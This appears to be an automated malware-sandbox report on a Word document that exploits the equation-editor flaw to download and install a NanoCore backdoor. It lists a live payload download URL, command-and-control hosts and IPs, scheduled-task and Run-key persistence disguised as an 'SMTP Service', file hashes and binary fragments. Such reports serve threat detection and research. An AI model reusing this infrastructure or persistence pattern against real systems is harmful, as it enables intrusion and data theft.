      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
      Masquerading      		LSA Secrets31
      Virtualization/Sandbox Evasion      		SSHKeyloggingData Transfer Size Limits2
      Non-Application Layer Protocol      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common31
      Virtualization/Sandbox Evasion      		Cached Domain Credentials1
      Application Window Discovery      		VNCGUI Input CaptureExfiltration Over C2 Channel122
      Application Layer Protocol      		Jamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items312
      Process Injection      		DCSync1
      Remote System Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      Hidden Files and Directories      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 558855 Sample: DOC_MDR0307_019.doc Startdate: 24/01/2022 Architecture: WINDOWS Score: 100 55 vijayikohli1.bounceme.net 2->55 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 22 other signatures 2->67 9 EQNEDT32.EXE 11 2->9         started        14 WINWORD.EXE 291 19 2->14         started        16 taskeng.exe 1 2->16         started        18 smtpsvc.exe 2->18         started        signatures3 process4 dnsIp5 57 paxz.tk 2.58.149.41, 49165, 80 GBTCLOUDUS Netherlands 9->57 45 C:\Users\user\AppData\...\plugmancdht5461.exe, PE32 9->45 dropped 47 C:\Users\user\AppData\...\plugmanzx[1].exe, PE32 9->47 dropped 77 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->77 20 plugmancdht5461.exe 3 9->20         started        49 ~WRF{6F85BCFE-F7E6...1-5E2AC6A32603}.tmp, Composite 14->49 dropped 24 RegSvcs.exe 16->24         started        26 smtpsvc.exe 16->26         started        file6 signatures7 process8 file9 41 C:\Users\user\AppData\Roaming\ZdNnwVcb.exe, PE32 20->41 dropped 43 C:\Users\user\AppData\Local\...\tmp41F1.tmp, XML 20->43 dropped 69 Multi AV Scanner detection for dropped file 20->69 71 Machine Learning detection for dropped file 20->71 73 Uses schtasks.exe or at.exe to add and modify task schedules 20->73 75 4 other signatures 20->75 28 RegSvcs.exe 1 12 20->28         started        33 powershell.exe 6 20->33         started        35 schtasks.exe 20->35         started        signatures10 process11 dnsIp12 59 vijayikohli1.bounceme.net 103.153.78.234, 3132, 49166, 49167 TWIDC-AS-APTWIDCLimitedHK unknown 28->59 51 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 28->51 dropped 53 C:\Program Files (x86)\...\smtpsvc.exe, PE32 28->53 dropped 79 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->79 37 schtasks.exe 28->37         started        39 schtasks.exe 28->39         started        file13 signatures14 process15

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      DOC_MDR0307_019.doc23%ReversingLabsDocument-Office.Exploit.Heuristic

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp100%AviraEXP/CVE-2017-11882.Gen
      C:\Users\user\AppData\Roaming\plugmancdht5461.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\ZdNnwVcb.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe100%Joe Sandbox ML
      C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%MetadefenderBrowse
      C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe40%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
      C:\Users\user\AppData\Roaming\ZdNnwVcb.exe40%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
      C:\Users\user\AppData\Roaming\plugmancdht5461.exe40%ReversingLabsByteCode-MSIL.Backdoor.NanoBot

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      9.0.RegSvcs.exe.400000.3.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      9.0.RegSvcs.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      9.0.RegSvcs.exe.400000.2.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      9.0.RegSvcs.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      9.2.RegSvcs.exe.5a0000.2.unpack100%AviraTR/NanoCore.fadteDownload File
      9.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      9.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://paxz.tk/plugmanzx.exe100%Avira URL Cloudmalware
      vijayikohli1.bounceme.net0%Avira URL Cloudsafe
      127.0.0.10%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      paxz.tk
      		2.58.149.41
      		truetrue
        		unknown
        vijayikohli1.bounceme.net
        		103.153.78.234
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://paxz.tk/plugmanzx.exetrue
          • Avira URL Cloud: malware
          		unknown
          4,0,419161966,0000000000099000,00000104,00000010,00020000,00000000,1,0true
            		low
            vijayikohli1.bounceme.nettrue
            • Avira URL Cloud: safe
            		unknown
            127.0.0.1true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://google.comRegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmpfalse
              		high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameplugmancdht5461.exe, 00000004.00000002.433210954.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                103.153.78.234
                		vijayikohli1.bounceme.netunknown
                		134687TWIDC-AS-APTWIDCLimitedHKtrue
                2.58.149.41
                		paxz.tkNetherlands
                		395800GBTCLOUDUStrue

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:558855
                Start date:24.01.2022
                Start time:15:30:23
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 12m 48s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:DOC_MDR0307_019.doc
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:22
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.expl.evad.winDOC@20/21@14/2
                EGA Information:
                • Successful, ratio: 80%
                HDC Information:
                • Successful, ratio: 3.9% (good quality ratio 3.5%)
                • Quality average: 81.4%
                • Quality standard deviation: 34.3%
                HCA Information:
                • Successful, ratio: 90%
                • Number of executed functions: 64
                • Number of non-executed functions: 9
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .doc
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                • Execution Graph export aborted for target smtpsvc.exe, PID 2284 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: DOC_MDR0307_019.doc

                Simulations

                Behavior and APIs

                TimeTypeDescription
                15:30:23API Interceptor40x Sleep call for process: EQNEDT32.EXE modified
                15:30:25API Interceptor51x Sleep call for process: plugmancdht5461.exe modified
                15:30:28API Interceptor4x Sleep call for process: schtasks.exe modified
                15:30:28API Interceptor11x Sleep call for process: powershell.exe modified
                15:30:30API Interceptor1433x Sleep call for process: RegSvcs.exe modified
                15:30:35Task SchedulerRun new task: SMTP Service path: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" s>$(Arg0)
                15:30:36API Interceptor327x Sleep call for process: taskeng.exe modified
                15:30:36AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                15:30:37Task SchedulerRun new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)
                15:30:38API Interceptor4x Sleep call for process: smtpsvc.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                103.153.78.234ozT6Kif37P9Trrb.exeGet hashmaliciousBrowse
                  P0_00122.docGet hashmaliciousBrowse
                    BmFKvDpmPT.exeGet hashmaliciousBrowse
                      2.58.149.41POX101497.docGet hashmaliciousBrowse
                      • paxz.tk/ivoryzx.exe
                      Quotation Inquiry.docGet hashmaliciousBrowse
                      • peak-tv.tk/petercodyzx.exe
                      exclusive21 3.docGet hashmaliciousBrowse
                      • paxz.tk/exclusivezx.exe
                      new_order.rtfGet hashmaliciousBrowse
                      • kizitox.cf/aguerozx.exe
                      RFQ8086A22.docGet hashmaliciousBrowse
                      • paxz.tk/simonzx.exe
                      New_Oder_Jan2022_Urgent_Quote.docGet hashmaliciousBrowse
                      • kizitox.cf/bryantzx.exe
                      print_01.docGet hashmaliciousBrowse
                      • peak-tv.tk/wealthzx.exe
                      exclusive20 2.docGet hashmaliciousBrowse
                      • paxz.tk/exclusivezx.exe
                      20221586.docGet hashmaliciousBrowse
                      • peak-tv.tk/successzx.exe
                      Payment Order.docGet hashmaliciousBrowse
                      • peak-tv.tk/damianozx.exe
                      Shipment Document BL,INV and Packing List Attached.docGet hashmaliciousBrowse
                      • peak-tv.tk/blackzx.exe
                      LIST FOR QUOTE.docGet hashmaliciousBrowse
                      • paxz.tk/kellyzx.exe
                      SCANNED-COPY.docGet hashmaliciousBrowse
                      • paxz.tk/obizx.exe
                      exclusive19 9.docGet hashmaliciousBrowse
                      • paxz.tk/exclusivezx.exe
                      8576520.docGet hashmaliciousBrowse
                      • paxz.tk/emezx.exe
                      New_Quote_Order_1912022.docGet hashmaliciousBrowse
                      • kizitox.cf/bryantzx.exe
                      Korea-987677.docGet hashmaliciousBrowse
                      • paxz.tk/uzombazx.exe
                      20220119-2233.docGet hashmaliciousBrowse
                      • peak-tv.tk/damianozx.exe
                      PO 150061.docGet hashmaliciousBrowse
                      • kizitox.cf/kdotzx.exe
                      SCANNED-COPY.docGet hashmaliciousBrowse
                      • paxz.tk/obizx.exe

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      paxz.tkPOX101497.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      exclusive21 3.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      RFQ8086A22.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      exclusive20 2.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      LIST FOR QUOTE.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      SCANNED-COPY.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      exclusive19 9.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      8576520.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      Korea-987677.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      SCANNED-COPY.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      SKMBT18292092.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      58769325.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      170520.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      DOC_MDR0307_019.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      NewOrder.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      14-1-22.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      13-1-22.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      P0_00122.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      Payment Slip.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      INQUIRY 12 7.docGet hashmaliciousBrowse
                      • 2.58.149.41

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      TWIDC-AS-APTWIDCLimitedHKINV SC#21-SPJUL-136.xlsxGet hashmaliciousBrowse
                      • 103.153.79.104
                      4809227EE49AED05EEA812EC5FE60084177AE90A76E5A.exeGet hashmaliciousBrowse
                      • 103.155.92.143
                      05E2540B7113609289FFB8CCDCB605AA6DAC2873DCCE1.exeGet hashmaliciousBrowse
                      • 103.155.92.143
                      6104F2B4049168FEA236BB6A5B9A5194B878B61F87336.exeGet hashmaliciousBrowse
                      • 103.155.92.143
                      54BCD3308C140C8EC030F98697CC7F0E9D4585D54334A.exeGet hashmaliciousBrowse
                      • 103.155.92.143
                      07C18E8E0F92E75367DF02C4114947B038E86FCBC7C8E.exeGet hashmaliciousBrowse
                      • 103.155.92.143
                      ev8zhBsCzU.exeGet hashmaliciousBrowse
                      • 103.155.92.143
                      O5t4RGAkKg.exeGet hashmaliciousBrowse
                      • 103.155.92.143
                      KLP_1516_XC54.xlsxGet hashmaliciousBrowse
                      • 103.153.79.104
                      x86Get hashmaliciousBrowse
                      • 103.159.15.26
                      mslog.xlsxGet hashmaliciousBrowse
                      • 103.156.91.24
                      INQUIRY-749659-S1-1130818.xlsxGet hashmaliciousBrowse
                      • 103.153.79.104
                      PAYMENT PACKAGE_YKK_JAN.2021_1216.xlsxGet hashmaliciousBrowse
                      • 103.153.79.104
                      SCAN SALES CONTACT - POMEISCC.xlsxGet hashmaliciousBrowse
                      • 103.153.79.104
                      3964A1E13D2B3EE0C3C34B50D4785907C3FFD560DC3E4.exeGet hashmaliciousBrowse
                      • 103.155.92.143
                      1C57E67BF823C9C15D3AFB19746746DF06A218FB70816.exeGet hashmaliciousBrowse
                      • 103.155.92.143
                      ozT6Kif37P9Trrb.exeGet hashmaliciousBrowse
                      • 103.153.78.234
                      P0_00122.docGet hashmaliciousBrowse
                      • 103.153.78.234
                      BmFKvDpmPT.exeGet hashmaliciousBrowse
                      • 103.153.78.234
                      Proforma-Invoice.exeGet hashmaliciousBrowse
                      • 103.153.214.97
                      GBTCLOUDUSPOX101497.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      hrttshkxhj.exeGet hashmaliciousBrowse
                      • 2.56.59.42
                      O5t4RGAkKg.exeGet hashmaliciousBrowse
                      • 2.56.59.42
                      DG3kRWrQrf.exeGet hashmaliciousBrowse
                      • 2.56.59.42
                      Quotation Inquiry.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      exclusive21 3.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      new_order.rtfGet hashmaliciousBrowse
                      • 2.58.149.41
                      RFQ8086A22.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      New_Oder_Jan2022_Urgent_Quote.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      print_01.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      exclusive20 2.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      20221586.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      Payment Order.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      Shipment Document BL,INV and Packing List Attached.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      LIST FOR QUOTE.docGet hashmaliciousBrowse
                      • 2.58.149.41
                      mslog.xlsxGet hashmaliciousBrowse
                      • 2.58.149.169
                      bw7D4IigL8.exeGet hashmaliciousBrowse
                      • 2.56.56.131
                      X6hcXmeuHl.exeGet hashmaliciousBrowse
                      • 2.58.149.169
                      W65aOXgKkH.exeGet hashmaliciousBrowse
                      • 2.56.56.114
                      SCANNED-COPY.docGet hashmaliciousBrowse
                      • 2.58.149.41

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      C:\Program Files (x86)\SMTP Service\smtpsvc.exeP0_00122.docGet hashmaliciousBrowse
                        PO 11325201021.xlsxGet hashmaliciousBrowse
                          PO #11325201021.xlsxGet hashmaliciousBrowse
                            we-ship-SNE-9874657.xlsxGet hashmaliciousBrowse
                              Import order764536.xlsxGet hashmaliciousBrowse
                                PI.xlsxGet hashmaliciousBrowse
                                  swift.xlsGet hashmaliciousBrowse
                                    PENDING INVOICES.docGet hashmaliciousBrowse
                                      RFQ-2201847.xlsxGet hashmaliciousBrowse
                                        Postal Financial Services.docGet hashmaliciousBrowse
                                          85a3f6aa_by_Libranalysis.rtfGet hashmaliciousBrowse
                                            Files Specification.xlsxGet hashmaliciousBrowse
                                              Update of the OFFICE PACK.xlamGet hashmaliciousBrowse
                                                Quotation Assurance.docGet hashmaliciousBrowse
                                                  Update of the OFFICE PACK.docGet hashmaliciousBrowse
                                                    DHL Documents 7.exeGet hashmaliciousBrowse

                                                      Created / dropped Files

                                                      C:\Program Files (x86)\SMTP Service\smtpsvc.exe

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):45216
                                                      Entropy (8bit):6.136703067968073
                                                      Encrypted:false
                                                      SSDEEP:768:Vjs96lj/cps+zk2d0suWB6Iq8NbeYjiwMEBQwp:VAhRzdd0sHI+eYfMEBHp
                                                      MD5:62CE5EF995FD63A1847A196C2E8B267B
                                                      SHA1:114706D7E56E91685042430F783AE227866AA77F
                                                      SHA-256:89F23E31053C39411B4519BF6823969CAD9C7706A94BA7E234B9062ACE229745
                                                      SHA-512:ABACC9B3C03631D3439A992504A11FB3C817456FFA4760EACE8FE5DF86908CE2F24565A717EB35ADCF60C34A78A1F6E24881BA0B8680FDE66D97085FDE4423B2
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: P0_00122.doc, Detection: malicious, Browse
                                                      • Filename: PO 11325201021.xlsx, Detection: malicious, Browse
                                                      • Filename: PO #11325201021.xlsx, Detection: malicious, Browse
                                                      • Filename: we-ship-SNE-9874657.xlsx, Detection: malicious, Browse
                                                      • Filename: Import order764536.xlsx, Detection: malicious, Browse
                                                      • Filename: PI.xlsx, Detection: malicious, Browse
                                                      • Filename: swift.xls, Detection: malicious, Browse
                                                      • Filename: PENDING INVOICES.doc, Detection: malicious, Browse
                                                      • Filename: RFQ-2201847.xlsx, Detection: malicious, Browse
                                                      • Filename: Postal Financial Services.doc, Detection: malicious, Browse
                                                      • Filename: 85a3f6aa_by_Libranalysis.rtf, Detection: malicious, Browse
                                                      • Filename: Files Specification.xlsx, Detection: malicious, Browse
                                                      • Filename: Update of the OFFICE PACK.xlam, Detection: malicious, Browse
                                                      • Filename: Quotation Assurance.doc, Detection: malicious, Browse
                                                      • Filename: Update of the OFFICE PACK.doc, Detection: malicious, Browse
                                                      • Filename: DHL Documents 7.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.W..............0..d............... ........@.. ...............................J....`.....................................O.......8............r...>..........t................................................ ............... ..H............text....c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B........................H........+..4S..........$...P...t........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o.........(....o ...o!.....,..o"...t......*..0..(....... ....s#........o$....X..(....-..*.o%...*.0...........(&......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe

                                                      Download File
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:downloaded
                                                      Size (bytes):473088
                                                      Entropy (8bit):7.83796766223819
                                                      Encrypted:false
                                                      SSDEEP:12288:d3jmSsNIXVfqxWnvkrWOzAG30uYs8VGriQ:dySsNFcGzkJV
                                                      MD5:7031570AA150B893F68A32900327B2AE
                                                      SHA1:CAEB6580B9D33EEDEA97C7775AD0853A33A59B3A
                                                      SHA-256:F515A9D2910DA428D7803AFC2244476A5B185F30361482CC1DD49670513281A5
                                                      SHA-512:CFA535B9A5931D41E2177447D6A255ACFB97BA4A0672A776CD6B741515DD9F473CD834A8E119BD096934B954590A2368EECF62A1953C77A5DF7B8AB8152A8773
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 40%
                                                      IE Cache URL:http://paxz.tk/plugmanzx.exe
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{.a..............0..,...........J... ...`....@.. ....................................@.................................<J..O....`.. ............................................................................ ............... ..H............text....*... ...,.................. ..`.rsrc... ....`......................@..@.reloc...............6..............@..B................pJ......H.......`..........0...(...8............................................................................0..........*....0...........{....*..0............}....*.0..N........ =.G. ....a%..^E....'...............+%.{...... .*.Z ....a+.. ..T.Z ....a+..*...0..;........ TQs. c]i.a%..^E................+..{...... v._.Z w...a+..*..0.............}....*....0..;.........{..... .. .GJ.a%..^E................+.. x~..Z ...a+..*..0............}......}.....(!... ..$. .1.Wa%...^E....-......

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                      Category:dropped
                                                      Size (bytes):225280
                                                      Entropy (8bit):7.977458406087125
                                                      Encrypted:false
                                                      SSDEEP:6144:GKapIaW6DbWT0alL+POEDGP/pmR+nSgPTCpg6:GKapIoDb2ehOl
                                                      MD5:9D7C0E1AB35845B41EAA2E647E3304B3
                                                      SHA1:3366137596EA189EE13AEA3A6675402F7C225E71
                                                      SHA-256:57620EFF414EAC67B3BE86E03CD151AAB2EE129DD469BE32625540B99EC3659D
                                                      SHA-512:F728D58AF400A99FDFF34D0D58EBA8CA73B4C25CE325C10C3EB217EAC1481C8B407F9D324B444C6A7AB781B83F015FD44DFDD274ED65217EA75D2B2F19A31384
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{98065E3E-C6B7-49AF-9D9F-8AB4FD115355}.tmp

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):12800
                                                      Entropy (8bit):3.6171441415563126
                                                      Encrypted:false
                                                      SSDEEP:384:nzU4Brwnh+AxLae3HZ/fQscNpPfwJW6B8WZ:Y4dwkAdTHZZqpP8V8WZ
                                                      MD5:99C092D6432777075332EEEED24D7924
                                                      SHA1:520FC60D469B02390E4CBB944D405258A99DE14C
                                                      SHA-256:A9A6A35010D4701CB25C9231A0D27E193FC2D84F2CF3F4E12361E75F1134F604
                                                      SHA-512:9864694E457887CAA5200B20FC9EC6743D00E6596DD5F55C1F0A31566B0AFC9802803786955476E389EF12118F32F81E821D4B3FEA069A7A8C8872D80822FB18
                                                      Malicious:false
                                                      Preview:@.].'.?./.5.7._.4...(.@.?.9.!.3...=.3.$.3.?.<.%.?.6.0.-.'.3.+.@.3...5./.>.?.(.?.(.,.=.?.5.3.&.!.2...6.$.?.?.!.:.`.(.=.@.2.~.=.>.+.(.[.|.8.>.?...%.<.|.2.?.?.>.<.%.+.3.:.].+.%.?.|._./.).@...&.:.?.0.4.$.<.3.).]...<.6.?.%.&..._.?.,...*.@.?.:.,.:.4.%.?.1.#.?.7.6.:.?.^.>.?.^.%.].>.,.?.%.`.2.].`.2.7.<.~.?.|.%.?.^.%.|...0.>.%.!.2.^.8.^.(.!.&.6._.#.?.`.^./.?.5.).5.@.*.;.7.@.`.'.:.:.:.<...1.[...~.?.,.~.;.=.:.8.~.9.`.?.#.|.$.^.?...%.....!.'.'.>.*.?.?.?.$.2.8.^.6.9.?.?.?.3.-.(.%.^.$...+.].@...6._.`.3.@.?.;.4.4.(...^.].(.%.6.-.[.~.4.$.1.$.!.6.6.,.0.?...@.?.8.,.`.`.$.1.&.0./.?.^.].-.1.[.?...>.$.<.*.;...@.2.!.?.0.4.(.:...~.?.@._.(.$.>.&.~.^.?...[.3.$.^...~...3...?.7.+.....~.$.1.].-.+...?.?.'.?.].=.8.).@.-.1.~.2.?.+.&.?./.?.2.*.7.;.`.$.=.!.).<.?.~.9.4.).&.&.@.+.[.?.#.?.3.?.5.(.1.=.?...?.%.'.-.1.^.%.'.#.-.?.;.?...-.:.^.:.~.*.5.=.].?.>.[.-./.@.<.6.'.!.[.(.;.-.!.!.7.9...].)._.^.%.3.1./.5.!.;.!.?.-.`.+.5.$.*.+.[.).2.2.7.!.4.@.#.-.%.2...&.:.,.0.,.^.&.&.%.@.<.:.&.1.6.~.:.+.(.>.?.<.8.3.7.-.<.#.~.#._.*.9.?.$.

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EA9EF1E3-15A6-45BA-9A80-F6F38BA9CAD0}.tmp

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):0.05390218305374581
                                                      Encrypted:false
                                                      SSDEEP:3:ol3lYdn:4Wn
                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                      Malicious:false
                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\tmp41F1.tmp

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\plugmancdht5461.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1574
                                                      Entropy (8bit):5.110571978917777
                                                      Encrypted:false
